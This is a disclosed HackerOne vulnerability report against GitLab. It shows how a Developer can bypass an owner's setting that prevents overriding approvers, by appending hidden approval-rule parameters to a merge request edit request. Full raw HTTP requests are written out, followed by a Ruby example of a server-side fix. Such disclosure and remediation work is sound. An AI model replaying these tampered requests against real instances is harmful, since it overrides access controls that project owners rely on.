Override approvers and approvals required per merge request despite no permissions
**[HackerOne report #544756](https://hackerone.com/reports/544756)** by `ashish_r_padelkar` on 2019-04-21, assigned to `estrike`:

### Summary

Hello,

The Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by having the below settings in project settings:

![Screenshot_2019-04-22_at_00.28.49.png](https://h1.sec.gitlab.net/a/544756/473362/Screenshot_2019-04-22_at_00.28.49.png)

However, `Developer` users can still create new approval rules per merge request!

### Steps to reproduce

1. As a project owner, set settings like below for the merge request approval rule:

   ![Screenshot_2019-04-22_at_00.28.49.png](https://h1.sec.gitlab.net/a/544756/473362/Screenshot_2019-04-22_at_00.28.49.png)

2. As a `Developer` user in a project, go to any merge request and EDIT it. Once it reloads, you see that you cannot EDIT or create new approval rules.

3. Without doing anything else, just click on save and capture the below request:

   ```
   POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
   Host: gitlab.com
   Connection: close
   Content-Length: 542
   Cache-Control: max-age=0
   Origin: https://gitlab.com
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
   Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
   Accept-Encoding: gzip, deflate
   Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
   Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

   utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=
   ```

4. Append the below parameters to the above request:

   ```
   &merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
   ```

   Here `3148078` is my user ID; you may try adding yours if mine doesn't work for you.

5. So the final request would be like:

   ```
   POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
   Host: gitlab.com
   Connection: close
   Content-Length: 542
   Cache-Control: max-age=0
   Origin: https://gitlab.com
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
   Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
   Accept-Encoding: gzip, deflate
   Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
   Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

   utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
   ```

6. Send this request. Once done, click on EDIT merge request again and scroll down to approval rules.

7. Now you should see the approval rule created despite it not being allowed by the owners!

   ![Screenshot_2019-04-22_at_00.31.04.png](https://h1.sec.gitlab.net/a/544756/473363/Screenshot_2019-04-22_at_00.31.04.png)

### What is the current *bug* behavior?

A Developer can override the merge request approval rules despite the settings by the owner!

### What is the expected *correct* behavior?

A Developer should not be allowed to create an approval rule when the owner isn't allowing it.

### Output of checks

This bug happens on GitLab.com and probably on omnibus installations too!

Regards,
Ashish

## Impact

Developers can override approval rule settings.

## Attachments

**Warning:** Attachments received through HackerOne, please exercise caution!

* [Screenshot_2019-04-22_at_00.28.49.png](https://h1.sec.gitlab.net/a/544756/473362/Screenshot_2019-04-22_at_00.28.49.png)
* [Screenshot_2019-04-22_at_00.31.04.png](https://h1.sec.gitlab.net/a/544756/473363/Screenshot_2019-04-22_at_00.31.04.png)
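The root cause in the report is that the approval-rule fields are only hidden in the edit form, while the server still accepts the nested `approval_rules_attributes` parameters from any role. The following Ruby is an added illustration, not GitLab's own code, of the server-side check that closes this gap: the parameter filter drops the approval-rule keys unless the project setting permits overriding or the caller holds an overriding role. The `Project`, `User`, role names and key lists are assumptions made for the example.

```ruby
# Added example (not GitLab code): enforce the "prevent overriding approvers
# per merge request" setting in the parameter filter, not just in the UI.

# Hypothetical project setting and role model, assumed for this example.
Project = Struct.new(:disable_overriding_approvers_per_merge_request)
User    = Struct.new(:name, :role) # role: :developer, :maintainer or :owner

OVERRIDE_ROLES = %i[maintainer owner].freeze

# A user may edit approval rules on an MR if overriding is not disabled for
# the project, or if the user holds a role that is allowed to override.
def can_override_approvers?(user, project)
  return true unless project.disable_overriding_approvers_per_merge_request
  OVERRIDE_ROLES.include?(user.role)
end

# Fields a Developer may always submit (mirrors the form in the report).
BASE_KEYS = %w[title description assignee_id milestone_id label_ids
               target_branch force_remove_source_branch squash lock_version].freeze
# Fields that are only honoured for users allowed to override approvers.
APPROVAL_KEYS = %w[approval_rules_attributes].freeze

# Strong-parameter style whitelist. Returns [permitted_hash, rejected_keys];
# rejected keys are worth logging, since a client sending them despite the
# UI hiding the form indicates a hand-crafted request.
def filter_merge_request_params(raw, user, project)
  allowed = BASE_KEYS.dup
  allowed.concat(APPROVAL_KEYS) if can_override_approvers?(user, project)
  permitted = raw.select { |key, _| allowed.include?(key) }
  [permitted, raw.keys - permitted.keys]
end

# Constructed parameters shaped like the appended fields in the report.
TAMPERED = {
  "title" => "ExampleMergeRequest",
  "target_branch" => "master",
  "approval_rules_attributes" => [
    { "name" => "ThisIsCreatedDespiteSettingsByOnwer",
      "user_ids" => ["3148078"], "approvals_required" => "1" }
  ]
}.freeze

if __FILE__ == $PROGRAM_NAME
  locked = Project.new(true)
  permitted, rejected = filter_merge_request_params(TAMPERED, User.new("dev", :developer), locked)
  puts "developer: permitted=#{permitted.keys.inspect} rejected=#{rejected.inspect}"
end
```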